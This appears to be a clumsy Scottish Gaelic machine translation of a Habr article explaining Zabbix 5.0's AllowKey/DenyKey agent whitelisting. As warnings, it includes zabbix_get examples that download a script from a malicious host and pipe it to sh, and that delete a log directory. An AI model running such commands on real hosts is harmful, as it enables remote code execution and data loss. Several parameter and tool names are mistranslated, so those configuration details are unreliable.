Taic liosta dhubh agus liosta geal airson meatrach taobh àidseant
Tikhon Uskov, Einnseanair Amalachaidh, Zabbix
Cùisean tèarainteachd dàta
Tha feart ùr aig Zabbix 5.0 a leigeas leat tèarainteachd ann an siostaman a leasachadh a’ cleachdadh Zabbix Agent agus a thèid an àite an t-seann pharamadair Dèan comas air RemoteCommands.
Tha leasachaidhean ann an tèarainteachd shiostaman stèidhichte air àidseant a’ tighinn bhon fhìrinn gum faod àidseant àireamh mhòr de ghnìomhan a dh’ fhaodadh a bhith cunnartach a dhèanamh.
- Faodaidh an neach-ionaid cha mhòr fiosrachadh sam bith a chruinneachadh, a’ toirt a-steach fiosrachadh dìomhair no a dh’ fhaodadh a bhith cunnartach, bho fhaidhlichean rèiteachaidh, faidhlichean log, faidhlichean facal-faire, no faidhlichean sam bith eile.
Mar eisimpleir, a’ cleachdadh goireas zabbix_get gheibh thu cothrom air liosta de luchd-cleachdaidh, na clàran dachaigh aca, faidhlichean facal-faire, msaa.
A’ faighinn cothrom air dàta a’ cleachdadh an goireas zabbix_get
FIOSRACHADH. Chan fhaighear dàta air ais ach ma tha an neach-ionaid air ceadan a leughadh air an fhaidhle fhreagarrach. Ach, mar eisimpleir, am faidhle /etc/passwd/ leughadh leis a h-uile neach-cleachdaidh.
- Faodaidh an neach-ionaid cuideachd òrdughan a dh’ fhaodadh a bhith cunnartach a chuir an gnìomh. Mar eisimpleir, iuchair *siostam.run[]** a’ leigeil leat òrdughan iomallach sam bith a chuir an gnìomh air nodan lìonra, a’ toirt a-steach ruith sgriobtaichean bho eadar-aghaidh lìn Zabbix a bhios cuideachd a’ cur an gnìomh òrdughan air taobh an àidseant.
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]
- Air Linux, bidh an t-àidseant a’ ruith gu bunaiteach às aonais sochairean freumha, agus air Windows bidh e a’ ruith mar sheirbheis mar System agus tha cothrom gun bhacadh air an t-siostam faidhle. Mar sin, mura tèid atharrachaidhean a dhèanamh air paramadairean Zabbix Agent às deidh an stàladh, tha cothrom aig an neach-ionaid air a’ chlàr, an siostam faidhle agus faodaidh e ceistean WMI a chuir an gnìomh.
Ann an dreachan nas tràithe am paramadair Dèan comas airRemoteCommands=0 ceadaichte ach na meatrach a chur à comas leis an iuchair *siostam.run[]** agus a’ ruith sgriobtaichean bhon eadar-aghaidh lìn, ach cha robh dòigh ann casg a chuir air ruigsinneachd air faidhlichean fa-leth, iuchraichean fa leth a cheadachadh no a chuir à comas a chaidh a chuir a-steach leis an neach-ionaid, no cuingealachadh a thoirt air cleachdadh paramadairean fa leth.
A’ cleachdadh am paramadair EnableRemoteCommand ann an dreachan nas tràithe de Zabbix
Ceadaich Key/DenyKey
Bidh Zabbix 5.0 a ’cuideachadh le bhith a’ dìon an aghaidh ruigsinneachd gun chead le bhith a ’toirt seachad liostaichean geala agus liostaichean dubha airson a bhith a’ ceadachadh agus a ’diùltadh meatrach air taobh an neach-ionaid.
Ann an Zabbix 5.0 a h-uile iuchair, a’ toirt a-steach *siostam.run[]** air an comasachadh, agus chaidh dà roghainn rèiteachaidh àidseant ùr a chur ris:
Ceadaich = - sgrùdaidhean ceadaichte;
AicheadhKey= - sgrùdaidhean toirmisgte;
far a bheil pàtran prìomh ainm le paramadairean a bhios a’ cleachdadh metacharacters (*).
Leigidh na h-iuchraichean AllowKey agus DenyKey leat metrics fa leth a cheadachadh no a dhiùltadh stèidhichte air pàtran sònraichte. Eu-coltach ri paramadairean rèiteachaidh eile, chan eil an àireamh de pharamadairean AllowKey / DenyKey cuingealaichte. Leigidh seo dhut mìneachadh gu soilleir dè dìreach as urrainn don neach-ionaid a dhèanamh san t-siostam le bhith a ’cruthachadh craobh de sgrùdaidhean - iuchraichean so-ghnìomhaichte, far a bheil àite glè chudromach aig an òrdugh anns a bheil iad sgrìobhte.
Sreath de riaghailtean
Tha na riaghailtean air an sgrùdadh san òrdugh anns an tèid iad a-steach don fhaidhle rèiteachaidh. Tha an iuchair air a sgrùdadh a rèir nan riaghailtean ron chiad gheama, agus cho luath ‘s a bhios iuchair an eileamaid dàta a’ freagairt ris a ’phàtran, tha e ceadaichte no àicheadh. Às deidh seo, stadaidh sgrùdadh riaghailtean agus thèid na h-iuchraichean a tha air fhàgail a leigeil seachad.
Mar sin, ma tha eileamaid a’ maidseadh an dà chuid ri cead agus riaghailt àicheadh, bidh an toradh an urra ri dè an riaghailt a tha sa chiad fhaidhle rèiteachaidh.
2 riaghailtean eadar-dhealaichte leis an aon phàtran agus iuchair vfs.file.size[/tmp/file]
An òrdugh airson na h-iuchraichean AllowKey/DenyKey a chleachdadh:
- riaghailtean mionaideach,
- riaghailtean coitcheann,
- riaghailt toirmisgte.
Mar eisimpleir, ma tha feum agad air cothrom air faidhlichean ann am pasgan sònraichte, feumaidh tu an-toiseach cead a thoirt dhaibh faighinn a-steach, agus an uairsin a h-uile càil eile nach eil a 'tighinn a-steach do na ceadan stèidhichte a dhiùltadh. Ma thèid an riaghailt diùltadh a chleachdadh an toiseach, thèid ruigsinneachd don phasgan a dhiùltadh.
Sreath ceart
Ma dh’ fheumas tu leigeil le 2 ghoireas ruith tro *siostam.run[]**, agus thèid an riaghailt àicheadh a shònrachadh an toiseach, cha tèid na goireasan a chuir air bhog, oir bidh a’ chiad phàtran an-còmhnaidh a rèir iuchair sam bith, agus thèid na riaghailtean às deidh sin a leigeil seachad.
Sreath ceàrr
Pàtrain
Riaghailtean bunaiteach
Is e abairt le cairtean fiadhaich a th’ ann am pàtran. Bidh am metacharacter (*) a’ maidseadh àireamh sam bith de charactaran aig suidheachadh sònraichte. Faodar metacharacters a chleachdadh an dà chuid anns a’ phrìomh ainm agus ann am paramadairean. Mar eisimpleir, faodaidh tu a 'chiad paramadair a mhìneachadh gu teann le teacsa, agus sònraich an ath fhear mar chairt-fiadhaich.
Feumaidh paramadairean a bhith dùinte ann an camagan ceàrnagach [].
system.run[*
- ceàrrvfs.file*.txt]
- ceàrrvfs.file.*[*]
- deas
Eisimpleirean de chleachdadh wildcard.
- Anns a 'phrìomh ainm agus ann am paramadair. Anns a 'chùis seo, chan eil an iuchair a' freagairt ri iuchair coltach ris nach eil paramadair ann, oir anns a 'phàtran dh' ainmich sinn gu bheil sinn airson crìoch sònraichte fhaighinn den phrìomh ainm agus seata sònraichte de pharamadairean.
- Mura h-eil am pàtran a 'cleachdadh camagan ceàrnagach, tha am pàtran a' ceadachadh a h-uile iuchair anns nach eil crìochan agus a 'diùltadh a h-uile iuchair anns a bheil am paramadair ainmichte.
- Ma tha an iuchair sgrìobhte gu h-iomlan agus na paramadairean air an sònrachadh mar chairt-fiadhaich, maidsidh e iuchair coltach ris le paramadairean sam bith agus cha bhith e a’ freagairt ris an iuchair às aonais camagan ceàrnagach, i.e. bidh e ceadaichte no àicheadh.
Riaghailtean airson a bhith a 'lìonadh crìochan.
- Ma thathar an dùil iuchair le paramadairean a chleachdadh, feumar na paramadairean a shònrachadh anns an fhaidhle rèiteachaidh. Feumaidh paramadairean a bhith air an sònrachadh mar metacharacter. Feumar ruigsinneachd gu faidhle sam bith a dhiùltadh gu faiceallach agus aire a thoirt don fhiosrachadh a bheir an meatrach seachad fo litreachadh eadar-dhealaichte - le agus às aonais crìochan.
Feartan iuchraichean sgrìobhaidh le paramadairean
- Ma tha iuchair air a shònrachadh le paramadairean, ach tha na paramadairean roghainneil agus air an sònrachadh mar metacharacter, thèid iuchair gun pharamadairean a rèiteachadh. Mar eisimpleir, ma tha thu airson fiosrachadh fhaighinn mun luchd air an CPU a chur à comas agus sònrachadh gum bu chòir an iuchair system.cpu.load[*] a bhith à comas, na dì-chuimhnich gun till an iuchair às aonais crìochan an luach luchd cuibheasach.
Riaghailtean airson a bhith a 'lìonadh crìochan
Notaichean
adjustment
- Chan urrainn don neach-cleachdaidh cuid de riaghailtean atharrachadh, mar eisimpleir, riaghailtean lorg no riaghailtean fèin-chlàraidh àidseant. Chan eil riaghailtean AllowKey/DenyKey a’ toirt buaidh air na crìochan a leanas:
- Ainm aoigheachd
- HostMetadataItem
- HostInterfaceItem
FIOSRACHADH. Ma chuireas rianaire iuchair à comas, nuair a thèid faighneachd dha, cha toir Zabbix seachad fiosrachadh air carson a tha an meatrach no an iuchair san roinn-seòrsaNOCHDADH'. Chan eil fiosrachadh mu toirmeasg air òrdughan iomallach a chuir an gnìomh cuideachd air a thaisbeanadh anns na faidhlichean log àidseant. Tha seo airson adhbharan tèarainteachd, ach faodaidh e dì-bhugachadh iom-fhillte a dhèanamh ma tha meatrach ann an roinn gun taic airson adhbhar air choireigin.
- Cha bu chòir dhut a bhith an urra ri òrdugh sònraichte sam bith airson faidhlichean rèiteachaidh taobh a-muigh a cheangal (mar eisimpleir, ann an òrdugh na h-aibideil).
Goireasan loidhne-àithne
Às deidh dhut na riaghailtean a stèidheachadh, feumaidh tu dèanamh cinnteach gu bheil a h-uile dad air a rèiteachadh gu ceart.
Faodaidh tu aon de thrì roghainnean a chleachdadh:
- Cuir meatrach ri Zabbix.
- Dèan deuchainn le zabbix_àidseant. Zabbix àidseant le roghainn -clò (-p) a’ sealltainn a h-uile iuchair (a tha ceadaichte gu bunaiteach) ach a-mhàin an fheadhainn nach eil ceadaichte leis an rèiteachadh. Agus leis an roghainn -deuchainn (-t) oir tillidh iuchair toirmisgte'Iuchair nì nach eil taic ann'.
- Dèan deuchainn le zabbix_faigh. Goireas zabbix_faigh le roghainn -k tillidh e'ZBX_NOTSUPPORTED: Meatrach neo-aithnichte'.
Ceadaich no diùltadh
Faodaidh tu cothrom air faidhle a dhiùltadh agus dearbhadh, mar eisimpleir, a’ cleachdadh a’ ghoireas zabbix_faighgu bheil cothrom air an fhaidhle air a dhiùltadh.
**
FIOSRACHADH. Thathas a’ seachnadh luachan sa pharameter.
Anns a 'chùis seo, faodar faighinn gu faidhle mar sin tro shlighe eadar-dhealaichte. Mar eisimpleir, ma tha symlink a’ leantainn thuige.
Thathas a’ moladh sùil a thoirt air diofar roghainnean airson a bhith a’ cur an sàs nan riaghailtean ainmichte, agus cuideachd aire a thoirt do na cothroman a th’ ann faighinn seachad air na toirmeasg.
Вопросы и ответы
Do cheist. Carson a chaidh pàtran cho iom-fhillte le a chànan fhèin a thaghadh airson cunntas a thoirt air riaghailtean, ceadan agus toirmeasg? Carson nach robh e comasach, mar eisimpleir, na h-abairtean cunbhalach a chleachdas Zabbix a chleachdadh?
Freagairt. Is e cùis dèanadais regex a tha seo oir mar as trice chan eil ann ach aon àidseant agus bidh e a’ sgrùdadh àireamh mhòr de mheatairean. Is e obair gu math trom a th’ ann an Regex agus chan urrainn dhuinn sgrùdadh a dhèanamh air mìltean de mheatairean san dòigh seo. Cairtean-fiadhaich - fuasgladh uile-choitcheann, air a chleachdadh gu farsaing agus sìmplidh.
Do cheist. Nach eil na faidhlichean Include ann an òrdugh na h-aibideil?
Freagairt. Cho fad ‘s as aithne dhomh, tha e cha mhòr do-dhèanta ro-innse dè an òrdugh anns an tèid riaghailtean a chuir an sàs ma sgaoileas tu na riaghailtean thairis air diofar fhaidhlichean. Tha mi a’ moladh a bhith a’ cruinneachadh a h-uile riaghailt AllowKey/DenyKey ann an aon Cuir a-steach faidhle, leis gu bheil iad ag eadar-obrachadh le chèile, agus a’ toirt a-steach am faidhle seo.
Do cheist. Ann an Zabbix 5.0 an roghainn 'Dèan comas airRemoteCommands=' a dhìth bhon fhaidhle rèiteachaidh, agus chan eil ach AllowKey/DenyKey ri fhaighinn?
Freagairt. Tha, tha sin ceart.
Спасибо за внимание!
Source: www.habr.com